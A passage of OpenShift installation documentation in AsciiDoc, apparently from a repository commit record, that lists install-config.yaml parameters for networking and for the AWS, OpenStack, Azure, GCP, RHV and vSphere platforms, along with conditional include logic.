For example, if `hostPrefix` is set to `23`, then each node is assigned a `\/23` subnet out of the given `cidr`, allowing for 510 (2^(32 - 23) - 2) pod IP addresses.\n|A subnet prefix. The default value is `23`.\n\n|`networking.serviceNetwork`\n|The IP address block for services. The default is `172.30.0.0\/16`.\n\nThe OpenShift SDN and OVN-Kubernetes Container Network Interface (CNI) network providers support only a single IP address block for the service network.\n|An IP address block in CIDR format. For example, `172.30.0.0\/16`.\n\n[source,yaml]\n----\nnetworking:\n serviceNetwork:\n - 172.30.0.0\/16\n----\n\n|`networking.machineNetwork`\n|The IP address blocks for machines.\n|Array of objects\n\n[source,yaml]\n----\nnetworking:\n machineNetwork:\n - cidr: 10.0.0.0\/16\n----\n\n|`networking.machineNetwork.cidr`\n|Required if you use `networking.machineNetwork`. An IP address block. The default is `10.0.0.0\/16` for all platforms other than libvirt. For libvirt, the default is `192.168.126.0\/24`.\n|IP network in Classless Inter-Domain Routing (CIDR) notation. For example, `10.0.0.0\/16`.\n\n|`publish`\n|How to publish or expose the user-facing endpoints of your cluster, such as the Kubernetes API, OpenShift routes.\n|`Internal` or `External`. To deploy a private cluster, which cannot be accessed from the internet, set `publish` to `Internal`. The default value is `External`.\n\n|`sshKey`\n| The SSH key to authenticate access to your cluster machines.\n[NOTE]\n====\nFor production {product-title} clusters on which you want to perform installation debugging or disaster recovery, specify an SSH key that your `ssh-agent` process uses.\n====\na|For example, `sshKey: ssh-ed25519 AAAA..`.\n\n|====\n\n\nifdef::aws[]\n.Optional AWS parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.aws.amiID`\n|The AWS AMI used to boot compute machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`compute.platform.aws.iamRole`\n|A pre-existing AWS IAM role applied to the compute machine pool instance profiles. You can use these fields to match naming schemes and include predefined permissions boundaries for your IAM roles. If undefined, the installation program creates a new IAM role.\n|The name of a valid AWS IAM role.\n\n|`compute.platform.aws.rootVolume.iops`\n|The Input\/Output Operations Per Second (IOPS) that is reserved for the root volume.\n|Integer, for example `4000`.\n\n|`compute.platform.aws.rootVolume.size`\n|The size in GiB of the root volume.\n|Integer, for example `500`.\n\n|`compute.platform.aws.rootVolume.type`\n|The instance type of the root volume.\n|Valid link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/EBSVolumeTypes.html[AWS EBS instance type],\nsuch as `io1`.\n\n|`compute.platform.aws.type`\n|The EC2 instance type for the compute machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`compute.platform.aws.zones`\n|The availability zones where the installation program creates machines for the compute machine pool. 
If you provide your own VPC, you must provide a subnet in that availability zone.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`compute.aws.region`\n|The AWS region that the installation program creates compute resources in.\n|Any valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`controlPlane.platform.aws.amiID`\n|The AWS AMI used to boot control plane machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`controlPlane.platform.aws.iamRole`\n|A pre-existing AWS IAM role applied to the control plane machine pool instance profiles. You can use these fields to match naming schemes and include predefined permissions boundaries for your IAM roles. If undefined, the installation program creates a new IAM role.\n|The name of a valid AWS IAM role.\n\n|`controlPlane.platform.aws.type`\n|The EC2 instance type for the control plane machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`controlPlane.platform.aws.zones`\n|The availability zones where the installation program creates machines for the\ncontrol plane machine pool.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a link:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`controlPlane.aws.region`\n|The AWS region that the installation program creates control plane resources in.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`platform.aws.amiID`\n|The AWS AMI used to boot all machines for the cluster. If set, the AMI must\nbelong to the same region as the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`platform.aws.hostedZone`\n|An existing Route 53 private hosted zone for the cluster. You can only use a pre-existing hosted zone when also supplying your own VPC. The hosted zone must already be associated with the user-provided VPC before installation. Also, the domain of the hosted zone must be the cluster domain or a parent of the cluster domain. If undefined, the installation program creates a new hosted zone.\n|String, for example `Z3URY6TWQ91KVV`.\n\n|`platform.aws.serviceEndpoints.name`\n|The AWS service endpoint name. Custom endpoints are only required for cases\nwhere alternative AWS endpoints, like FIPS, must be used. Custom API endpoints\ncan be specified for EC2, S3, IAM, Elastic Load Balancing, Tagging, Route 53,\nand STS AWS services.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] name.\n\n|`platform.aws.serviceEndpoints.url`\n|The AWS service endpoint URL. The URL must use the `https` protocol and the\nhost must trust the certificate.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] URL.\n\n|`platform.aws.userTags`\n|A map of keys and values that the installation program adds as tags to all resources that it creates.\n|Any valid YAML map, such as key value pairs in the `<key>: <value>` format. 
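A brief sketch, with tag keys and values assumed for illustration:\n\n[source,yaml]\n----\nplatform:\n aws:\n  userTags:\n   adminContact: jdoe # keys and values assumed for illustration\n   costCenter: \"7536\"\n----\n\n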
For more information about AWS tags, see link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/Using_Tags.html[Tagging Your Amazon EC2 Resources] in the AWS documentation.\n\n|`platform.aws.subnets`\n|If you provide the VPC instead of allowing the installation program to create the VPC for you, specify the subnet for the cluster to use. The subnet must be part of the same `machineNetwork[].cidr` ranges that you specify. For a standard cluster, specify a public and a private subnet for each availability zone. For a private cluster, specify a private subnet for each availability zone.\n|Valid subnet IDs.\n\n|====\nendif::aws[]\n\nifdef::osp[]\n.Additional {rh-openstack-first} parameters\n[cols=\".^2m,.^3a,^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.rootVolume.size`\n|For compute machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`compute.platform.openstack.rootVolume.type`\n|For compute machines, the root volume's type.\n|String, for example `performance`.\n\n|`controlPlane.platform.openstack.rootVolume.size`\n|For control plane machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`controlPlane.platform.openstack.rootVolume.type`\n|For control plane machines, the root volume's type.\n|String, for example `performance`.\n\n|`platform.openstack.cloud`\n|The name of the {rh-openstack} cloud to use from the list of clouds in the\n`clouds.yaml` file.\n|String, for example `MyCloud`.\n\n|`platform.openstack.externalNetwork`\n|The {rh-openstack} external network name to be used for installation.\n|String, for example `external`.\n\n|`platform.openstack.computeFlavor`\n|The {rh-openstack} flavor to use for control plane and compute machines.\n\nThis property is deprecated. To use a flavor as the default for all machine pools, add it as the value of the `type` key in the `platform.openstack.defaultMachinePlatform` property. You can also set a flavor value for each machine pool individually.\n\n|String, for example `m1.xlarge`.\n|====\n\n.Optional {rh-openstack} parameters\n[%header, cols=\".^2,.^3,.^5a\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with compute machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`compute.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with compute machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`compute.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`controlPlane.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with control plane machines. 
Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`controlPlane.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with control plane machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`controlPlane.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`platform.openstack.clusterOSImage`\n|The location from which the installer downloads the {op-system} image.\n\nYou must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with an SHA-256 checksum.\n\nFor example, `\\http:\/\/mirror.example.com\/images\/rhcos-43.81.201912131630.0-openstack.x86_64.qcow2.gz?sha256=ffebbd68e8a1f2a245ca19522c16c86f67f9ac8e4e0c1f0a812b068b16f7265d`.\nThe value can also be the name of an existing Glance image, for example `my-rhcos`.\n\n|`platform.openstack.clusterOSImageProperties`\n|Properties to add to the installer-uploaded ClusterOSImage in Glance. This property is ignored if `platform.openstack.clusterOSImage` is set to an existing Glance image.\n\nYou can use this property to exceed the default persistent volume (PV) limit for {rh-openstack} of 26 PVs per node. To exceed the limit, set the `hw_scsi_model` property value to `virtio-scsi` and the `hw_disk_bus` value to `scsi`.\n\nYou can also use this property to enable the QEMU guest agent by including the `hw_qemu_guest_agent` property with a value of `yes`.\n|A list of key-value string pairs. For example, `[\"hw_scsi_model\": \"virtio-scsi\", \"hw_disk_bus\": \"scsi\"]`.\n\n|`platform.openstack.defaultMachinePlatform`\n|The default machine pool platform configuration.\n|\n[source,json]\n----\n{\n \"type\": \"ml.large\",\n \"rootVolume\": {\n \"size\": 30,\n \"type\": \"performance\"\n }\n}\n----\n\n|`platform.openstack.ingressFloatingIP`\n|An existing floating IP address to associate with the Ingress port. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.apiFloatingIP`\n|An existing floating IP address to associate with the API load balancer. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.externalDNS`\n|IP addresses for external DNS servers that cluster instances use for DNS resolution.\n|A list of IP addresses as strings. For example, `[\"8.8.8.8\", \"192.168.1.12\"]`.\n\n|`platform.openstack.machinesSubnet`\n|The UUID of a {rh-openstack} subnet that the cluster's nodes use. Nodes and virtual IP (VIP) ports are created on this subnet.\n\nThe first item in `networking.machineNetwork` must match the value of `machinesSubnet`.\n\nIf you deploy to a custom subnet, you cannot specify an external DNS server to the {product-title} installer. 
Instead, link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_openstack_platform\/16.0\/html\/command_line_interface_reference\/subnet[add DNS to the subnet in {rh-openstack}].\n\n|A UUID as a string. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n|====\nendif::osp[]\n\nifdef::azure[]\n.Additional Azure parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`controlPlane.platform.azure.osDisk.diskSizeGB`\n|The Azure disk size for the VM.\n|Integer that represents the size of the disk in GB. The minimum supported disk size is `1024`.\n\n|`platform.azure.baseDomainResourceGroupName`\n|The name of the resource group that contains the DNS zone for your base domain.\n|String, for example `production_cluster`.\n\n|`platform.azure.resourceGroupName`\n| The name of an already existing resource group to install your cluster to. This resource group must be empty and only used for this specific cluster; the cluster components assume ownership of all resources in the resource group. If you limit the service principal scope of the installation program to this resource group, you must ensure all other resources used by the installation program in your environment have the necessary permissions, such as the public DNS zone and virtual network. Destroying the cluster using the installation program deletes this resource group.\n|String, for example `existing_resource_group`.\n\n|`platform.azure.outboundType`\n|The outbound routing strategy used to connect your cluster to the internet. If\nyou are using user-defined routing, you must have pre-existing networking\navailable where the outbound routing has already been configured prior to\ninstalling a cluster. The installation program is not responsible for\nconfiguring user-defined routing.\n|`LoadBalancer` or `UserDefinedRouting`. The default is `LoadBalancer`.\n\n|`platform.azure.region`\n|The name of the Azure region that hosts your cluster.\n|Any valid region name, such as `centralus`.\n\n|`platform.azure.zone`\n|List of availability zones to place machines in. For high availability, specify\nat least two zones.\n|List of zones, for example `[\"1\", \"2\", \"3\"]`.\n\n|`platform.azure.networkResourceGroupName`\n|The name of the resource group that contains the existing VNet that you want to deploy your cluster to. This name cannot be the same as the `platform.azure.baseDomainResourceGroupName`.\n|String.\n\n|`platform.azure.virtualNetwork`\n|The name of the existing VNet that you want to deploy your cluster to.\n|String.\n\n|`platform.azure.controlPlaneSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your control plane machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.computeSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your compute machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.cloudName`\n|The name of the Azure cloud environment that is used to configure the Azure SDK with the appropriate Azure API endpoints. 
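A hedged sketch of the matching `install-config.yaml` fragment, assuming an installation that targets the Azure US Government cloud (fragment only; all other required fields are omitted):\n\n[source,yaml]\n----\n# fragment only; value taken from this table\nplatform:\n  azure:\n    cloudName: AzureUSGovernmentCloud\n----\n\n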
If empty, the default value `AzurePublicCloud` is used.\n|Any valid cloud environment, such as `AzurePublicCloud` or `AzureUSGovernmentCloud`.\n\n|====\n\n[NOTE]\n====\nYou cannot customize\nlink:https:\/\/azure.microsoft.com\/en-us\/global-infrastructure\/availability-zones\/[Azure Availability Zones]\nor\nlink:https:\/\/docs.microsoft.com\/en-us\/azure\/azure-resource-manager\/resource-group-using-tags[Use tags to organize your Azure resources]\nwith an Azure cluster.\n====\nendif::azure[]\n\n\nifdef::gcp[]\n.Additional Google Cloud Platform (GCP) parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.gcp.network`\n|The name of the existing VPC that you want to deploy your cluster to.\n|String.\n\n|`platform.gcp.type`\n|The link:https:\/\/cloud.google.com\/compute\/docs\/machine-types[GCP machine type].\n|The GCP machine type.\n\n|`platform.gcp.zones`\n|The availability zones where the installation program creates machines for the specified MachinePool.\n|A list of valid link:https:\/\/cloud.google.com\/compute\/docs\/regions-zones#available[GCP availability zones], such as `us-central1-a`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`platform.gcp.controlPlaneSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your control plane machines to.\n|The subnet name.\n\n|`platform.gcp.computeSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your compute machines to.\n|The subnet name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.name`\n|The name of the customer managed encryption key to be used for control plane machine disk encryption.\n|The encryption key name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.keyRing`\n|For control plane machines, the name of the KMS key ring to which the KMS key belongs.\n|The KMS key ring name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.location`\n|For control plane machines, the GCP location in which the key ring exists. For more information on KMS locations, see Google's documentation on link:https:\/\/cloud.google.com\/kms\/docs\/locations[Cloud KMS locations].\n|The GCP location for the key ring.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.projectID`\n|For control plane machines, the ID of the project in which the KMS key ring exists. This value defaults to the VM project ID if not set.\n|The GCP project ID.\n\n\/\/\/\/\n`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKeyServiceAccount`\n\nThe GCP Compute Engine System service account used for the encryption request for the given KMS key. The Compute Engine default service account is always used for control plane machines during installation, which follows this pattern: `service-<project_number>@compute-system.iam.gserviceaccount.com`. The default service account must have access to the KMS key specified for the control plane machines. The custom service account defined is available for use during post-installation operations. For more information on GCP service accounts, see Google's documentation on link:https:\/\/cloud.google.com\/iam\/docs\/service-accounts#types[Types of service accounts].\n\nThe GCP Compute Engine System service account email, like `<service_account_name>@<project_id>.iam.gserviceaccount.com`.\n\/\/\/\/\n\/\/ kmsKeyServiceAccount not yet fully supported in 4.7. 
Re-add when more stable.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.name`\n|The name of the customer managed encryption key to be used for compute machine disk encryption.\n|The encryption key name.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.keyRing`\n|For compute machines, the name of the KMS key ring to which the KMS key belongs.\n|The KMS key ring name.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.location`\n|For compute machines, the GCP location in which the key ring exists. For more information on KMS locations, see Google's documentation on link:https:\/\/cloud.google.com\/kms\/docs\/locations[Cloud KMS locations].\n|The GCP location for the key ring.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.projectID`\n|For compute machines, the ID of the project in which the KMS key ring exists. This value defaults to the VM project ID if not set.\n|The GCP project ID.\n\n\/\/\/\/\n`compute.platform.gcp.osDisk.encryptionKey.kmsKeyServiceAccount`\n\nFor compute machines, the GCP Compute Engine System service account used for the encryption request for the given KMS key. If left undefined, the Compute Engine default service account is used, which follows this pattern: `service-<project_number>@compute-system.iam.gserviceaccount.com`. For more information on GCP service accounts, see Google's documentation on link:https:\/\/cloud.google.com\/iam\/docs\/service-accounts#types[Types of service accounts].\n\nThe GCP Compute Engine System service account email, like `<service_account_name>@<project_id>.iam.gserviceaccount.com`.\n\/\/\/\/\n\/\/ kmsKeyServiceAccount not yet fully supported in 4.7. Re-add when more stable.\n|====\n\nendif::gcp[]\n\nifdef::rhv[]\n\n.Additional {rh-virtualization-first} parameters for clusters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.ovirt.ovirt_cluster_id`\n|Required. The Cluster where the VMs will be created.\n|String. For example: `68833f9f-e89c-4891-b768-e2ba0815b76b`\n\n|`platform.ovirt.ovirt_storage_domain_id`\n|Required. The Storage Domain ID where the VM disks will be created.\n|String. For example: `ed7b0f4e-0e96-492a-8fff-279213ee1468`\n\n|`platform.ovirt.ovirt_network_name`\n|Required. The network name where the VM nics will be created.\n|String. For example: `ocpcluster`\n\n|`platform.ovirt.vnicProfileID`\n|Required. The vNIC profile ID of the VM network interfaces. This can be inferred if the cluster network has a single profile.\n|String. For example: `3fa86930-0be5-4052-b667-b79f0a729692`\n\n|`platform.ovirt.api_vip`\n|Required. An IP address on the machine network that will be assigned to the API virtual IP (VIP). You can access the OpenShift API at this endpoint.\n|String. Example: `10.46.8.230`\n\n|`platform.ovirt.ingress_vip`\n|Required. An IP address on the machine network that will be assigned to the Ingress virtual IP (VIP).\n|String. Example: `10.46.8.232`\n|====\n\n\n.Additional {rh-virtualization} parameters for machine pools\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`<machine-pool>.platform.ovirt.cpu`\n|Optional. Defines the CPU of the VM.\n|Object\n\n|`<machine-pool>.platform.ovirt.cpu.cores`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of cores. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.cpu.sockets`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of sockets per core. 
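As an illustrative example, a hypothetical pool that sets 4 cores and 2 sockets gives each VM 8 vCPUs. 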
Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.memoryMB`\n|Optional. Memory of the VM in MiB.\n|Integer\n\n|`<machine-pool>.platform.ovirt.instanceTypeID`\n|Optional. An instance type UUID, such as `00000009-0009-0009-0009-0000000000f1`, which you can get from the `https:\/\/<engine-fqdn>\/ovirt-engine\/api\/instancetypes` endpoint.\n|String of UUID\n\n|`<machine-pool>.platform.ovirt.osDisk`\n|Optional. Defines the first and bootable disk of the VM.\n|String\n\n|`<machine-pool>.platform.ovirt.osDisk.sizeGB`\n|Required if you use `<machine-pool>.platform.ovirt.osDisk`. Size of the disk in GiB.\n|Number\n\n|`<machine-pool>.platform.ovirt.vmType`\n|Optional. The VM workload type, such as `high-performance`, `server`, or `desktop`.\n|String\n|====\n\n[NOTE]\n====\nYou can replace `<machine-pool>` with `controlPlane` or `compute`.\n====\n\nendif::rhv[]\n\nifdef::vsphere,vmc[]\n.Additional VMware vSphere cluster parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.vCenter`\n|The fully-qualified host name or IP address of the vCenter server.\n|String\n\n|`platform.vsphere.username`\n|The user name to use to connect to the vCenter instance. This user must have at least\nthe roles and privileges that are required for\nlink:https:\/\/vmware.github.io\/vsphere-storage-for-kubernetes\/documentation\/vcp-roles.html[static or dynamic persistent volume provisioning]\nin vSphere.\n|String\n\n|`platform.vsphere.password`\n|The password for the vCenter user name.\n|String\n\n|`platform.vsphere.datacenter`\n|The name of the datacenter to use in the vCenter instance.\n|String\n\n|`platform.vsphere.defaultDatastore`\n|The name of the default datastore to use for provisioning volumes.\n|String\n\n|`platform.vsphere.folder`\n|_Optional_. The absolute path of an existing folder where the installation program creates the virtual machines. If you do not provide this value, the installation program creates a folder that is named with the infrastructure ID in the datacenter virtual machine folder.\n|String, for example, `\/<datacenter_name>\/vm\/<folder_name>\/<subfolder_name>`.\n\n|`platform.vsphere.network`\n|The network in the vCenter instance that contains the virtual IP addresses and DNS records that you configured.\n|String\n\n|`platform.vsphere.cluster`\n|The vCenter cluster to install the {product-title} cluster in.\n|String\n\n|`platform.vsphere.apiVIP`\n|The virtual IP (VIP) address that you configured for control plane API access.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.vsphere.ingressVIP`\n|The virtual IP (VIP) address that you configured for cluster ingress.\n|An IP address, for example `128.0.0.1`.\n|====\n\n.Optional VMware vSphere machine pool parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.clusterOSImage`\n|The location from which the installer downloads the {op-system} image. You must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with a SHA-256 checksum. For example, `\\https:\/\/mirror.openshift.com\/images\/rhcos-<version>-vmware.<architecture>.ova`.\n\n|`platform.vsphere.osDisk.diskSizeGB`\n|The size of the disk in gigabytes.\n|Integer\n\n|`platform.vsphere.cpus`\n|The total number of virtual processor cores to assign to a virtual machine.\n|Integer\n\n|`platform.vsphere.coresPerSocket`\n|The number of cores per socket in a virtual machine. 
The number of virtual CPUs (vCPUs) on the virtual machine is `platform.vsphere.cpus`\/`platform.vsphere.coresPerSocket`. The default value is `1`\n|Integer\n\n|`platform.vsphere.memoryMB`\n|The size of a virtual machine's memory in megabytes.\n|Integer\n|====\n\nendif::vsphere,vmc[]\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:!rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-network-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-customizations\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-network-customizations\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-vmc\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-installer-provisioned-vsphere\"]\n:!vsphere:\nendif::[]\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-network-customizations.adoc\n\/\/ * 
installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-network-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-custom.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-kuryr.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user-kuryr.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-custom.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-network-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-restricted-networks-vmc.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-network-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-restricted-networks-installer-provisioned-vsphere.adoc\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == 